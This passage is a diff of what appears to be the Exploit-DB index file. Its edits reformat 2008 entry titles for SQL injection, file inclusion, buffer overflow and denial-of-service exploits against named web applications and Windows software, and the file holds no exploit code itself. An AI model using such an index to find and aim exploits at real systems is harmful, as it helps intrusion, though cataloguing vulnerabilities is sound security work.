X",php,webapps,0 6250,platforms/php/webapps/6250.txt,"deeemm CMS (dmcms) 0.7.4 - Multiple Vulnerabilities",2008-08-15,"Khashayar Fereidani",php,webapps,0 6251,platforms/windows/dos/6251.txt,"ESET Smart Security 3.0.667.0 - Privilege Escalation PoC",2008-08-16,g_,windows,dos,0 6252,platforms/multiple/dos/6252.txt,"VLC 0.8.6i - .tta File Parsing Heap Overflow PoC",2008-08-16,g_,multiple,dos,0 6253,platforms/windows/dos/6253.txt,"EO Video 1.36 - Local Heap Overflow DoS / PoC",2008-08-16,j0rgan,windows,dos,0 -6254,platforms/php/webapps/6254.txt,"XNova 0.8 sp1 (xnova_root_path) Remote File Inclusion",2008-08-17,NuclearHaxor,php,webapps,0 +6254,platforms/php/webapps/6254.txt,"XNova 0.8 sp1 - (xnova_root_path) Remote File Inclusion",2008-08-17,NuclearHaxor,php,webapps,0 6255,platforms/php/webapps/6255.txt,"phpArcadeScript 4 - (cat) Remote SQL Injection",2008-08-17,"Hussin X",php,webapps,0 6256,platforms/windows/remote/6256.pl,"FlashGet 1.9.0.1012 - (FTP PWD Response) BoF Exploit (SafeSEH)",2008-08-17,"Guido Landi",windows,remote,0 6257,platforms/windows/dos/6257.pl,"WS_FTP Home/Professional FTP Client Remote Format String PoC",2008-08-17,securfrog,windows,dos,0 @@ -5866,19 +5866,19 @@ id,file,description,date,author,platform,type,port 6260,platforms/php/webapps/6260.txt,"cyberBB 0.6 - Multiple Remote SQL Injection Vulnerabilities",2008-08-18,cOndemned,php,webapps,0 6261,platforms/php/webapps/6261.txt,"php live helper <= 2.0.1 - Multiple Vulnerabilities",2008-08-18,"GulfTech Security",php,webapps,0 6262,platforms/windows/dos/6262.txt,"VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS",2008-08-18,g_,windows,dos,0 -6269,platforms/cgi/webapps/6269.txt,"TWiki 4.2.0 (configure) Remote File Disclosure",2008-08-19,Th1nk3r,cgi,webapps,0 +6269,platforms/cgi/webapps/6269.txt,"TWiki 4.2.0 - (configure) Remote File Disclosure",2008-08-19,Th1nk3r,cgi,webapps,0 6270,platforms/php/webapps/6270.txt,"SFS Affiliate Directory (id) SQL Injection",2008-08-19,"Hussin X",php,webapps,0 6271,platforms/php/webapps/6271.txt,"Ad Board (id) Remote SQL Injection",2008-08-19,"Hussin X",php,webapps,0 -6273,platforms/php/webapps/6273.txt,"SunShop <= 4.1.4 (id) Remote SQL Injection",2008-08-19,"GulfTech Security",php,webapps,0 +6273,platforms/php/webapps/6273.txt,"SunShop <= 4.1.4 - (id) Remote SQL Injection",2008-08-19,"GulfTech Security",php,webapps,0 6276,platforms/php/webapps/6276.txt,"Banner Management Script (tr.php id) Remote SQL Injection",2008-08-19,S.W.A.T.,php,webapps,0 6277,platforms/php/webapps/6277.txt,"Active PHP Bookmarks 1.1.02 - Remote SQL Injection",2008-08-19,"Hussin X",php,webapps,0 6278,platforms/windows/remote/6278.txt,"Anzio Web Print Object <= 3.2.30 - ActiveX Buffer Overflow Exploit",2008-08-20,"Core Security",windows,remote,0 6279,platforms/php/webapps/6279.pl,"Pars4U Videosharing 1.0 - XSS / Remote Blind SQL Injection Exploit",2008-08-20,Mr.SQL,php,webapps,0 -6280,platforms/php/webapps/6280.txt,"phpBazar 2.0.2 (adid) Remote SQL Injection",2008-08-20,e.wiZz!,php,webapps,0 +6280,platforms/php/webapps/6280.txt,"phpBazar 2.0.2 - (adid) Remote SQL Injection",2008-08-20,e.wiZz!,php,webapps,0 6281,platforms/php/webapps/6281.pl,"webEdition CMS (we_objectID) Blind SQL Injection Exploit",2008-08-20,Lidloses_Auge,php,webapps,0 -6284,platforms/php/webapps/6284.txt,"CustomCMS 4.0 (CCMS) print.php Remote SQL Injection",2008-08-21,~!Dok_tOR!~,php,webapps,0 +6284,platforms/php/webapps/6284.txt,"CustomCMS 4.0 - (CCMS) print.php Remote SQL Injection",2008-08-21,~!Dok_tOR!~,php,webapps,0 6285,platforms/php/webapps/6285.txt,"PhotoCart <= 3.9 - Multiple Remote SQL Injection Vulnerabilities",2008-08-21,~!Dok_tOR!~,php,webapps,0 -6286,platforms/php/webapps/6286.txt,"BandSite CMS 1.1.4 (Download Backup/XSS/CSRF) Remote Vulnerabilities",2008-08-21,SirGod,php,webapps,0 +6286,platforms/php/webapps/6286.txt,"BandSite CMS 1.1.4 - (Download Backup/XSS/CSRF) Remote Vulnerabilities",2008-08-21,SirGod,php,webapps,0 6287,platforms/php/webapps/6287.txt,"tinyCMS 1.1.2 - (templater.php) Local File Inclusion",2008-08-21,cOndemned,php,webapps,0 6288,platforms/php/webapps/6288.txt,"easysite 2.3 - Multiple Vulnerabilities",2008-08-21,SirGod,php,webapps,0 6291,platforms/php/webapps/6291.txt,"noname script <= 1.1 - Multiple Vulnerabilities",2008-08-23,SirGod,php,webapps,0 @@ -5896,8 +5896,8 @@ id,file,description,date,author,platform,type,port 6305,platforms/hardware/remote/6305.htm,"Belkin wireless G router + ADSL2 modem Auth Bypass Exploit",2008-08-25,noensr,hardware,remote,0 6306,platforms/php/webapps/6306.pl,"GeekLog <= 1.5.0 - Remote Arbitrary File Upload Exploit",2008-08-25,t0pP8uZz,php,webapps,0 6307,platforms/php/webapps/6307.txt,"Crafty Syntax Live Help <= 2.14.6 - (department) SQL Injection",2008-08-25,"GulfTech Security",php,webapps,0 -6309,platforms/php/webapps/6309.txt,"z-breaknews 2.0 (single.php) Remote SQL Injection",2008-08-26,cOndemned,php,webapps,0 -6310,platforms/php/webapps/6310.txt,"Kolifa.net Download Script 1.2 (id) SQL Injection",2008-08-26,Kacak,php,webapps,0 +6309,platforms/php/webapps/6309.txt,"z-breaknews 2.0 - (single.php) Remote SQL Injection",2008-08-26,cOndemned,php,webapps,0 +6310,platforms/php/webapps/6310.txt,"Kolifa.net Download Script 1.2 - (id) SQL Injection",2008-08-26,Kacak,php,webapps,0 6311,platforms/php/webapps/6311.php,"Simple PHP Blog (SPHPBlog) <= 0.5.1 Code Execution Exploit",2008-08-26,mAXzA,php,webapps,0 6312,platforms/php/webapps/6312.txt,"k-rate - (SQL/XSS) Multiple Vulnerabilities",2008-08-26,Corwin,php,webapps,0 6313,platforms/php/webapps/6313.txt,"CMME 1.12 - (LFI/XSS/CSRF/Backup/MkDir) Multiple Vulnerabilities",2008-08-26,SirGod,php,webapps,0 @@ -5909,32 +5909,32 @@ id,file,description,date,author,platform,type,port 6319,platforms/windows/dos/6319.html,"Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit",2008-08-27,shinnai,windows,dos,0 6320,platforms/php/webapps/6320.txt,"phpMyRealty <= 1.0.9 - Multiple Remote SQL Injection Vulnerabilities",2008-08-27,~!Dok_tOR!~,php,webapps,0 6321,platforms/php/webapps/6321.txt,"YourOwnBux 3.1 / 3.2 Beta - Remote SQL Injection",2008-08-27,~!Dok_tOR!~,php,webapps,0 -6322,platforms/windows/local/6322.pl,"Acoustica Mixcraft <= 4.2 Build 98 (mx4 file) Local BoF Exploit",2008-08-28,Koshi,windows,local,0 +6322,platforms/windows/local/6322.pl,"Acoustica Mixcraft <= 4.2 Build 98 - (mx4 file) Local BoF Exploit",2008-08-28,Koshi,windows,local,0 6323,platforms/windows/remote/6323.html,"Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BoF Exploit",2008-08-28,spdr,windows,remote,0 6324,platforms/windows/remote/6324.html,"Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit",2008-08-28,spdr,windows,remote,0 6325,platforms/php/webapps/6325.php,"Invision Power Board <= 2.3.5 - Multiple Vulnerabilities (2)",2008-08-29,DarkFig,php,webapps,0 6326,platforms/windows/dos/6326.html,"LogMeIn Remote Access Utility ActiveX Memory Corruption DoS",2008-08-29,"YAG KOHHA",windows,dos,0 6327,platforms/windows/dos/6327.html,"Najdi.si Toolbar ActiveX Remote Buffer Overflow PoC",2008-08-29,shinnai,windows,dos,0 6328,platforms/solaris/remote/6328.c,"Sun Solaris <= 10 snoop(1M) Utility Remote Exploit",2008-08-29,Andi,solaris,remote,0 -6329,platforms/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 (asx file) Local BoF Exploit",2008-08-29,Koshi,windows,local,0 +6329,platforms/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - (asx file) Local BoF Exploit",2008-08-29,Koshi,windows,local,0 6330,platforms/windows/dos/6330.txt,"Micrsoft Windows GDI - (CreateDIBPatternBrushPt) Heap Overflow PoC",2008-08-29,Ac!dDrop,windows,dos,0 6332,platforms/php/webapps/6332.txt,"brim 2.0.0 - (SQL/XSS) Multiple Vulnerabilities",2008-08-30,InjEctOr5,php,webapps,0 -6333,platforms/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 (bcproj file) Local BoF Exploit",2008-08-30,Koshi,windows,local,0 +6333,platforms/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 - (bcproj file) Local BoF Exploit",2008-08-30,Koshi,windows,local,0 6334,platforms/windows/remote/6334.html,"Friendly Technologies Read/Write Registry/Read Files Exploit",2008-08-30,spdr,windows,remote,0 6335,platforms/php/webapps/6335.txt,"Web Directory Script 1.5.3 - (site) SQL Injection",2008-08-31,"Hussin X",php,webapps,0 -6336,platforms/php/webapps/6336.txt,"Words tag script 1.2 (word) Remote SQL Injection",2008-08-31,"Hussin X",php,webapps,0 +6336,platforms/php/webapps/6336.txt,"Words tag script 1.2 - (word) Remote SQL Injection",2008-08-31,"Hussin X",php,webapps,0 6337,platforms/linux/local/6337.sh,"Postfix <= 2.6-20080814 - (symlink) Local Privilege Escalation Exploit",2008-08-31,RoMaNSoFt,linux,local,0 6338,platforms/php/webapps/6338.txt,"myPHPNuke < 1.8.8_8rc2 - (XSS/SQL) Multiple Vulnerabilities",2008-08-31,MustLive,php,webapps,0 6339,platforms/php/webapps/6339.txt,"webid 0.5.4 - Multiple Vulnerabilities",2008-08-31,InjEctOr5,php,webapps,0 -6341,platforms/php/webapps/6341.txt,"WeBid 0.5.4 (item.php id) Remote SQL Injection",2008-09-01,Stack,php,webapps,0 -6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 (go) Remote SQL Injection",2008-09-01,e.wiZz!,php,webapps,0 +6341,platforms/php/webapps/6341.txt,"WeBid 0.5.4 - (item.php id) Remote SQL Injection",2008-09-01,Stack,php,webapps,0 +6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 - (go) Remote SQL Injection",2008-09-01,e.wiZz!,php,webapps,0 6343,platforms/php/webapps/6343.txt,"CMSbright (id_rub_page) Remote SQL Injection",2008-09-01,"BorN To K!LL",php,webapps,0 6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-09-01,Stack,php,webapps,0 6345,platforms/windows/dos/6345.html,"VMware COM API ActiveX Remote Buffer Overflow PoC",2008-09-01,shinnai,windows,dos,0 -6346,platforms/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 (uid) SQL Injection Exploit",2008-09-01,"Virangar Security",php,webapps,0 +6346,platforms/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 - (uid) SQL Injection Exploit",2008-09-01,"Virangar Security",php,webapps,0 6347,platforms/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 - (artid) SQL Injection",2008-09-02,MustLive,php,webapps,0 -6348,platforms/php/webapps/6348.txt,"Coupon Script 4.0 (id) Remote SQL Injection",2008-09-02,"Hussin X",php,webapps,0 -6349,platforms/php/webapps/6349.txt,"Reciprocal Links Manager 1.1 (site) SQL Injection",2008-09-02,"Hussin X",php,webapps,0 +6348,platforms/php/webapps/6348.txt,"Coupon Script 4.0 - (id) Remote SQL Injection",2008-09-02,"Hussin X",php,webapps,0 +6349,platforms/php/webapps/6349.txt,"Reciprocal Links Manager 1.1 - (site) SQL Injection",2008-09-02,"Hussin X",php,webapps,0 6350,platforms/php/webapps/6350.txt,"AJ HYIP ACME (comment.php artid) SQL Injection",2008-09-02,"security fears team",php,webapps,0 6351,platforms/php/webapps/6351.txt,"AJ HYIP ACME (readarticle.php artid) SQL Injection",2008-09-02,InjEctOr5,php,webapps,0 6352,platforms/php/webapps/6352.txt,"CS-Cart <= 1.3.5 - (Auth Bypass) SQL Injection",2008-09-02,"GulfTech Security",php,webapps,0 @@ -5945,10 +5945,10 @@ id,file,description,date,author,platform,type,port 6357,platforms/php/webapps/6357.txt,"aspwebalbum 3.2 - (upload/SQL/XSS) Multiple Vulnerabilities",2008-09-03,Alemin_Krali,php,webapps,0 6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 - (fckeditor) Remote Arbitrary File Upload",2008-09-03,BugReport.IR,php,webapps,0 6361,platforms/php/webapps/6361.txt,"Living Local Website (listtest.php r) SQL Injection",2008-09-03,"Hussin X",php,webapps,0 -6362,platforms/php/webapps/6362.txt,"ACG-PTP 1.0.6 (adid) Remote SQL Injection",2008-09-04,"Hussin X",php,webapps,0 +6362,platforms/php/webapps/6362.txt,"ACG-PTP 1.0.6 - (adid) Remote SQL Injection",2008-09-04,"Hussin X",php,webapps,0 6363,platforms/php/webapps/6363.txt,"qwicsite pro - (SQL/XSS) Multiple Vulnerabilities",2008-09-04,Cr@zy_King,php,webapps,0 6364,platforms/php/webapps/6364.txt,"ACG-ScriptShop (cid) Remote SQL Injection",2008-09-04,"Hussin X",php,webapps,0 -6365,platforms/windows/dos/6365.php,"Google Chrome Browser 0.2.149.27 (1583) Remote Silent Crash PoC",2008-09-04,WHK,windows,dos,0 +6365,platforms/windows/dos/6365.php,"Google Chrome Browser 0.2.149.27 - (1583) Remote Silent Crash PoC",2008-09-04,WHK,windows,dos,0 6366,platforms/hardware/remote/6366.c,"MicroTik RouterOS <= 3.13 SNMP write (Set request) PoC",2008-09-05,ShadOS,hardware,remote,0 6367,platforms/windows/remote/6367.txt,"Google Chrome Browser 0.2.149.27 - (SaveAs) Remote BoF Exploit",2008-09-05,SVRT,windows,remote,0 6368,platforms/php/webapps/6368.php,"AWStats Totals (awstatstotals.php sort) Remote Code Execution Exploit",2008-09-05,"Ricardo Almeida",php,webapps,0 @@ -5965,14 +5965,14 @@ id,file,description,date,author,platform,type,port 6380,platforms/php/webapps/6380.txt,"Vastal I-Tech Mag Zone (cat_id) SQL Injection",2008-09-05,Stack,php,webapps,0 6381,platforms/php/webapps/6381.txt,"Vastal I-Tech Freelance Zone (coder_id) SQL Injection",2008-09-05,Stack,php,webapps,0 6382,platforms/php/webapps/6382.txt,"Vastal I-Tech Cosmetics Zone (cat_id) SQL Injection",2008-09-05,Stack,php,webapps,0 -6383,platforms/php/webapps/6383.txt,"EsFaq 2.0 (idcat) Remote SQL Injection",2008-09-05,SuB-ZeRo,php,webapps,0 -6385,platforms/php/webapps/6385.txt,"Vastal I-Tech Shaadi Zone 1.0.9 (tage) SQL Injection",2008-09-05,e.wiZz!,php,webapps,0 +6383,platforms/php/webapps/6383.txt,"EsFaq 2.0 - (idcat) Remote SQL Injection",2008-09-05,SuB-ZeRo,php,webapps,0 +6385,platforms/php/webapps/6385.txt,"Vastal I-Tech Shaadi Zone 1.0.9 - (tage) SQL Injection",2008-09-05,e.wiZz!,php,webapps,0 6386,platforms/windows/dos/6386.html,"Google Chrome Browser 0.2.149.27 Inspect Element DoS Exploit",2008-09-05,Metacortex,windows,dos,0 6387,platforms/windows/remote/6387.rb,"CitectSCADA ODBC Server Remote Stack Buffer Overflow Exploit (Metasploit)",2008-09-05,"Kevin Finisterre",windows,remote,2022 6388,platforms/php/webapps/6388.txt,"Vastal I-Tech Dating Zone (fage) SQL Injection",2008-09-06,ZoRLu,php,webapps,0 6389,platforms/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - Local .M3U File Stack Buffer Overflow Exploit",2008-09-06,"fl0 fl0w",windows,local,0 6390,platforms/php/webapps/6390.txt,"IntegraMOD 1.4.x - (Insecure Directory) Download Database",2008-09-06,TheJT,php,webapps,0 -6391,platforms/windows/dos/6391.htm,"Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit",2008-09-06,LiquidWorm,windows,dos,0 +6391,platforms/windows/dos/6391.htm,"Flock Social Web Browser 1.2.5 - (loop) Remote Denial of Service Exploit",2008-09-06,LiquidWorm,windows,dos,0 6392,platforms/php/webapps/6392.php,"Simple Machines Forum <= 1.1.5 Admin Reset Password Exploit (Win32)",2008-09-06,Raz0r,php,webapps,0 6393,platforms/php/webapps/6393.pl,"MemHT Portal <= 3.9.0 - Remote Create Shell Exploit",2008-09-06,Ams,php,webapps,0 6394,platforms/hardware/dos/6394.pl,"Samsung DVR SHR2040 HTTPD Remote Denial of Service DoS PoC",2008-09-07,"Alex Hernandez",hardware,dos,0 @@ -5984,7 +5984,7 @@ id,file,description,date,author,platform,type,port 6402,platforms/php/webapps/6402.txt,"Stash 1.0.3 - Multiple SQL Injection Vulnerabilities",2008-09-09,"Khashayar Fereidani",php,webapps,0 6403,platforms/php/webapps/6403.txt,"Hot Links SQL-PHP 3 - (report.php) Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0 6404,platforms/php/webapps/6404.txt,"Live TV Script (index.php mid) SQL Injection",2008-09-09,InjEctOr5,php,webapps,0 -6405,platforms/asp/webapps/6405.txt,"Creator CMS 5.0 (sideid) Remote SQL Injection",2008-09-09,"ThE X-HaCkEr",asp,webapps,0 +6405,platforms/asp/webapps/6405.txt,"Creator CMS 5.0 - (sideid) Remote SQL Injection",2008-09-09,"ThE X-HaCkEr",asp,webapps,0 6406,platforms/php/webapps/6406.txt,"Stash 1.0.3 Insecure Cookie Handling",2008-09-09,Ciph3r,php,webapps,0 6407,platforms/windows/remote/6407.c,"Microworld Mailscan 5.6.a Password Reveal Exploit",2008-09-09,SlaYeR,windows,remote,0 6408,platforms/php/webapps/6408.txt,"CMS Buzz (id) Remote SQL Injection",2008-09-09,"security fears team",php,webapps,0 @@ -5993,8 +5993,8 @@ id,file,description,date,author,platform,type,port 6411,platforms/php/webapps/6411.txt,"Availscript Photo Album - (pics.php) Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0 6412,platforms/php/webapps/6412.txt,"Availscript Classmate Script (viewprofile.php) SQL Injection",2008-09-09,Stack,php,webapps,0 6413,platforms/php/webapps/6413.txt,"Zanfi CMS lite 1.2 - Multiple Local File Inclusion Vulnerabilities",2008-09-10,SirGod,php,webapps,0 -6414,platforms/windows/remote/6414.html,"Peachtree Accounting 2004 (PAWWeb11.ocx) ActiveX Insecure Method",2008-09-10,"Jeremy Brown",windows,remote,0 -6416,platforms/php/webapps/6416.txt,"Libera CMS <= 1.12 (Cookie) Remote SQL Injection Exploit",2008-09-10,StAkeR,php,webapps,0 +6414,platforms/windows/remote/6414.html,"Peachtree Accounting 2004 - (PAWWeb11.ocx) ActiveX Insecure Method",2008-09-10,"Jeremy Brown",windows,remote,0 +6416,platforms/php/webapps/6416.txt,"Libera CMS <= 1.12 - (Cookie) Remote SQL Injection Exploit",2008-09-10,StAkeR,php,webapps,0 6417,platforms/php/webapps/6417.txt,"Availscript Jobs Portal Script - (jid) SQL Injection (Auth)",2008-09-10,InjEctOr5,php,webapps,0 6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - (fckeditor) Arbitrary File Upload",2008-09-10,reptil,php,webapps,0 6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0 @@ -6004,27 +6004,27 @@ id,file,description,date,author,platform,type,port 6424,platforms/windows/dos/6424.html,"Adobe Acrobat 9 - ActiveX Remote Denial of Service Exploit",2008-09-11,"Jeremy Brown",windows,dos,0 6425,platforms/php/webapps/6425.txt,"PhpWebGallery 1.3.4 - (XSS/LFI) Multiple Vulnerabilities",2008-09-11,"Khashayar Fereidani",php,webapps,0 6426,platforms/php/webapps/6426.txt,"Autodealers CMS AutOnline (pageid) SQL Injection",2008-09-11,r45c4l,php,webapps,0 -6427,platforms/php/webapps/6427.txt,"Sports Clubs Web Panel 0.0.1 (p) Local File Inclusion",2008-09-11,StAkeR,php,webapps,0 +6427,platforms/php/webapps/6427.txt,"Sports Clubs Web Panel 0.0.1 - (p) Local File Inclusion",2008-09-11,StAkeR,php,webapps,0 6428,platforms/php/webapps/6428.pl,"Easy Photo Gallery 2.1 - XSS/FD/Bypass/SQL Injection Exploit",2008-09-11,"Khashayar Fereidani",php,webapps,0 -6430,platforms/php/webapps/6430.txt,"D-iscussion Board 3.01 (topic) Local File Inclusion",2008-09-11,SirGod,php,webapps,0 +6430,platforms/php/webapps/6430.txt,"D-iscussion Board 3.01 - (topic) Local File Inclusion",2008-09-11,SirGod,php,webapps,0 6431,platforms/php/webapps/6431.pl,"phsBlog 0.2 Bypass SQL Injection Filtering Exploit",2008-09-11,"Khashayar Fereidani",php,webapps,0 6432,platforms/php/webapps/6432.py,"minb 0.1.0 - Remote Code Execution Exploit",2008-09-11,"Khashayar Fereidani",php,webapps,0 6433,platforms/php/webapps/6433.txt,"Autodealers CMS AutOnline (id) SQL Injection",2008-09-11,ZoRLu,php,webapps,0 6434,platforms/windows/dos/6434.html,"Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC",2008-09-11,LiquidWorm,windows,dos,0 -6435,platforms/php/webapps/6435.txt,"Sports Clubs Web Panel 0.0.1 (id) SQL Injection Vulnerabilities",2008-09-11,"Virangar Security",php,webapps,0 -6436,platforms/php/webapps/6436.txt,"PhpWebGallery 1.3.4 (cat) Blind SQL Injection",2008-09-11,Stack,php,webapps,0 +6435,platforms/php/webapps/6435.txt,"Sports Clubs Web Panel 0.0.1 - (id) SQL Injection Vulnerabilities",2008-09-11,"Virangar Security",php,webapps,0 +6436,platforms/php/webapps/6436.txt,"PhpWebGallery 1.3.4 - (cat) Blind SQL Injection",2008-09-11,Stack,php,webapps,0 6437,platforms/php/webapps/6437.txt,"Easy Photo Gallery 2.1 - Arbitrary Add Admin / remove user",2008-09-11,Stack,php,webapps,0 -6438,platforms/php/webapps/6438.pl,"Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit",2008-09-11,Tec-n0x,php,webapps,0 +6438,platforms/php/webapps/6438.pl,"Yourownbux 4.0 - (COOKIE) Authentication Bypass Exploit",2008-09-11,Tec-n0x,php,webapps,0 6439,platforms/php/webapps/6439.txt,"Sports Clubs Web Panel 0.0.1 - Remote File Upload",2008-09-12,Stack,php,webapps,0 6440,platforms/php/webapps/6440.pl,"PhpWebGallery 1.3.4 - Remote Blind SQL Injection Exploit",2008-09-12,ka0x,php,webapps,0 -6442,platforms/php/webapps/6442.txt,"pForum 1.30 (showprofil.php id) Remote SQL Injection",2008-09-12,tmh,php,webapps,0 -6443,platforms/php/webapps/6443.pl,"WebPortal CMS <= 0.7.4 (download.php aid) SQL Injection Exploit",2008-09-12,StAkeR,php,webapps,0 -6444,platforms/php/webapps/6444.txt,"iBoutique 4.0 (cat) Remote SQL Injection",2008-09-12,r45c4l,php,webapps,0 -6445,platforms/php/webapps/6445.txt,"SkaLinks 1.5 (register.php) Remote Arbitrary Add Editor",2008-09-12,mr.al7rbi,php,webapps,0 -6446,platforms/php/webapps/6446.txt,"vbLOGIX Tutorial Script <= 1.0 (cat_id) SQL Injection",2008-09-12,FIREH4CK3R,php,webapps,0 -6447,platforms/php/webapps/6447.txt,"pNews 2.03 (newsid) Remote SQL Injection",2008-09-12,r45c4l,php,webapps,0 +6442,platforms/php/webapps/6442.txt,"pForum 1.30 - (showprofil.php id) Remote SQL Injection",2008-09-12,tmh,php,webapps,0 +6443,platforms/php/webapps/6443.pl,"WebPortal CMS <= 0.7.4 - (download.php aid) SQL Injection Exploit",2008-09-12,StAkeR,php,webapps,0 +6444,platforms/php/webapps/6444.txt,"iBoutique 4.0 - (cat) Remote SQL Injection",2008-09-12,r45c4l,php,webapps,0 +6445,platforms/php/webapps/6445.txt,"SkaLinks 1.5 - (register.php) Remote Arbitrary Add Editor",2008-09-12,mr.al7rbi,php,webapps,0 +6446,platforms/php/webapps/6446.txt,"vbLOGIX Tutorial Script <= 1.0 - (cat_id) SQL Injection",2008-09-12,FIREH4CK3R,php,webapps,0 +6447,platforms/php/webapps/6447.txt,"pNews 2.03 - (newsid) Remote SQL Injection",2008-09-12,r45c4l,php,webapps,0 6448,platforms/php/webapps/6448.txt,"WebPortal CMS <= 0.7.4 - (fckeditor) Arbitrary File Upload",2008-09-12,S.W.A.T.,php,webapps,0 -6449,platforms/php/webapps/6449.php,"pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit",2008-09-13,Stack,php,webapps,0 +6449,platforms/php/webapps/6449.php,"pLink 2.07 - (linkto.php id) Remote Blind SQL Injection Exploit",2008-09-13,Stack,php,webapps,0 6450,platforms/php/webapps/6450.pl,"Sports Clubs Web Panel 0.0.1 - Remote Game Delete Exploit",2008-09-13,ka0x,php,webapps,0 6451,platforms/php/webapps/6451.txt,"Talkback 2.3.6 - Multiple Local File Inclusion/PHPInfo Disclosure Vulnerabilities",2008-09-13,SirGod,php,webapps,0 6452,platforms/php/webapps/6452.txt,"phpsmartcom 0.2 - (LFI/SQL) Multiple Vulnerabilities",2008-09-13,r3dm0v3,php,webapps,0 @@ -6037,80 +6037,80 @@ id,file,description,date,author,platform,type,port 6459,platforms/hardware/dos/6459.txt,"Nokia e90/n82 (s60v3) - Remote Denial of Service",2008-09-14,wins.mallow,hardware,dos,0 6460,platforms/php/webapps/6460.txt,"Kasseler CMS 1.1.0/1.2.0 Lite Remote SQL Injection Vulnerabilities",2008-09-14,~!Dok_tOR!~,php,webapps,0 6461,platforms/php/webapps/6461.txt,"Cpanel <= 11.x - (Fantastico) LFI (sec Bypass)",2008-09-14,joker_1,php,webapps,0 -6462,platforms/php/webapps/6462.pl,"CzarNews <= 1.20 (Cookie) Remote SQL Injection Exploit",2008-09-15,StAkeR,php,webapps,0 +6462,platforms/php/webapps/6462.pl,"CzarNews <= 1.20 - (Cookie) Remote SQL Injection Exploit",2008-09-15,StAkeR,php,webapps,0 6463,platforms/windows/dos/6463.rb,"Microsoft Windows - WRITE_ANDX SMB command handling Kernel DoS (Metasploit)",2008-09-15,"Javier Vicente Vallejo",windows,dos,0 6464,platforms/php/webapps/6464.txt,"CzarNews <= 1.20 - (Account Hijacking) Remote SQL Injection",2008-09-15,0ut0fbound,php,webapps,0 6465,platforms/php/webapps/6465.txt,"Pre Real Estate Listings (search.php c) SQL Injection",2008-09-15,JosS,php,webapps,0 6466,platforms/php/webapps/6466.txt,"Link Bid Script 1.5 - Multiple Remote SQL Injection Vulnerabilities",2008-09-15,SirGod,php,webapps,0 6467,platforms/php/webapps/6467.txt,"iScripts EasyIndex (produid) Remote SQL Injection",2008-09-16,SirGod,php,webapps,0 6468,platforms/php/webapps/6468.txt,"attachmax dolphin <= 2.1.0 - Multiple Vulnerabilities",2008-09-16,K-159,php,webapps,0 -6469,platforms/php/webapps/6469.txt,"Gonafish LinksCaffePRO 4.5 (index.php) SQL Injection",2008-09-16,sl4xUz,php,webapps,0 +6469,platforms/php/webapps/6469.txt,"Gonafish LinksCaffePRO 4.5 - (index.php) SQL Injection",2008-09-16,sl4xUz,php,webapps,0 6470,platforms/asp/webapps/6470.txt,"Hotel reservation System (city.asp city) Blind SQL Injection",2008-09-16,JosS,asp,webapps,0 6471,platforms/multiple/dos/6471.pl,"QuickTime 7.5.5 / ITunes 8.0 - Remote off by one Crash Exploit",2008-09-16,securfrog,multiple,dos,0 6472,platforms/multiple/dos/6472.c,"Postfix < 2.4.9 / 2.5.5 / 2.6-20080902 - (.forward) Local DoS Exploit",2008-09-16,"Albert Sellares",multiple,dos,0 -6473,platforms/php/webapps/6473.txt,"phpRealty 0.3 (INC) Remote File Inclusion",2008-09-17,ka0x,php,webapps,0 +6473,platforms/php/webapps/6473.txt,"phpRealty 0.3 - (INC) Remote File Inclusion",2008-09-17,ka0x,php,webapps,0 6474,platforms/windows/dos/6474.rb,"WonderWare SuiteLink 2.0 - Remote Denial of Service Exploit (Metasploit)",2008-09-17,"belay tows",windows,dos,0 -6475,platforms/php/webapps/6475.txt,"PHP Crawler 0.8 (footer) Remote File Inclusion",2008-09-17,Piker,php,webapps,0 +6475,platforms/php/webapps/6475.txt,"PHP Crawler 0.8 - (footer) Remote File Inclusion",2008-09-17,Piker,php,webapps,0 6476,platforms/hardware/remote/6476.html,"Cisco Router HTTP Administration CSRF Command Execution Exploit",2008-09-17,"Jeremy Brown",hardware,remote,0 6477,platforms/hardware/remote/6477.html,"Cisco Router - HTTP Administration CSRF Command Execution Exploit (2)",2008-09-17,"Jeremy Brown",hardware,remote,0 -6478,platforms/php/webapps/6478.txt,"Technote 7 (shop_this_skin_path) Remote File Inclusion",2008-09-17,webDEViL,php,webapps,0 +6478,platforms/php/webapps/6478.txt,"Technote 7 - (shop_this_skin_path) Remote File Inclusion",2008-09-17,webDEViL,php,webapps,0 6480,platforms/php/webapps/6480.txt,"x10media mp3 search engine 1.5.5 - Remote File Inclusion",2008-09-17,THUNDER,php,webapps,0 6481,platforms/php/dos/6481.c,"Femitter FTP Server 1.03 - (RETR) Remote Denial of Service Exploit PoC",2008-09-17,LiquidWorm,php,dos,0 6482,platforms/php/webapps/6482.txt,"addalink <= 4 Write Approved Links Remote",2008-09-17,Pepelux,php,webapps,0 6483,platforms/php/webapps/6483.txt,"E-Php CMS (article.php es_id) Remote SQL Injection",2008-09-18,HaCkeR_EgY,php,webapps,0 -6485,platforms/php/webapps/6485.txt,"addalink <= 4 (category_id) Remote SQL Injection",2008-09-18,ka0x,php,webapps,0 -6486,platforms/php/webapps/6486.txt,"ProArcadeScript 1.3 (random) 